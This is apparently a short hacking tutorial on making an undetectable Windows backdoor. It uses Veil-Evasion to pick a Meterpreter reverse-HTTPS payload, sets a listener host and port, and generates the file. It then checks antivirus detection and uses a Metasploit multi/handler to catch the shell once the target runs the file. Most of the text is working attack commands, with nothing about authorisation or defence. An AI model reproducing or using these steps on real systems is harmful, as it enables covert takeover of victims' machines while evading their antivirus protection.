CLIENT SIDE ATTACKS - Backdooring exe' s

Download an executable file first.

VEIL - FRAMEWORK

A backdoor is a file that gives us full control over the machine that it gets executed on.

Backdoors can be caught by Anti-Virus programs.

Veil is a framework for generating Undetectable backdoors.

1. Run veil

veil

Select tool 1 - Evasion.

2. List payloads and Select one

Veil/Evasion>: list

Veil-Evasion

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

[*] Available Payloads:

1)    autoit/shellcode\_inject/flat.py

2)    auxiliary/coldwar\_wrapper.py  
3)    auxiliary/macro\_converter.py  
4)    auxiliary/pyinstaller\_wrapper.py

5)    c/meterpreter/rev\_http.py  
6)    c/meterpreter/rev\_http\_service.py  
7)    c/meterpreter/rev\_tcp.py  
8)    c/meterpreter/rev\_tcp\_service.py

9)    cs/meterpreter/rev\_http.py  
10)    cs/meterpreter/rev\_https.py  
11)    cs/meterpreter/rev\_tcp.py  
12)    cs/shellcode\_inject/base64.py  
13)    cs/shellcode\_inject/virtual.py

14)    go/meterpreter/rev\_http.py  
15)    go/meterpreter/rev\_https.py  
16)    go/meterpreter/rev\_tcp.py  
17)    go/shellcode\_inject/virtual.py

18)    lua/shellcode\_inject/flat.py

19)    perl/shellcode\_inject/flat.py

20)    powershell/meterpreter/rev\_http.py  
21)    powershell/meterpreter/rev\_https.py  
22)    powershell/meterpreter/rev\_tcp.py  
23)    powershell/shellcode\_inject/psexec\_virtual.py  
24)    powershell/shellcode\_inject/virtual.py

25)    python/meterpreter/bind\_tcp.py  
26)    python/meterpreter/rev\_http.py  
27)    python/meterpreter/rev\_https.py  
28)    python/meterpreter/rev\_tcp.py  
29)    python/shellcode\_inject/aes\_encrypt.py  
30)    python/shellcode\_inject/arc\_encrypt.py  
31)    python/shellcode\_inject/base64\_substitution.py  
32)    python/shellcode\_inject/des\_encrypt.py  
33)    python/shellcode\_inject/flat.py  
34)    python/shellcode\_inject/letter\_substitution.py  
35)    python/shellcode\_inject/pidinject.py  
36)    python/shellcode\_inject/stallion.py

37)    ruby/meterpreter/rev\_http.py  
38)    ruby/meterpreter/rev\_https.py  
39)    ruby/meterpreter/rev\_tcp.py  
40)    ruby/shellcode\_inject/base64.py  
41)    ruby/shellcode\_inject/flat.py

3. Generating an undetectable backdoor using Veil 3

use go/meterpreter/rev_https.py

set LHOST 10.0.0.15
set LPORT 8080
set PROCESSORS 1
set SLEEP 6

4. Generate backdoor

generate

Scan the file through https://nodistribute.com/.

Run hander

1. Run Metasploit

msfconsole

2. Use the handler module.

use exploit/multi/handler

3. Set payload

set PAYLOAD [veil payload]

4. Set IP

set LHOST [your IP]

5. Set port

set LPORT [veil port]

6. exploit

exploit

Run the backdoor file on the target machine sucessfully.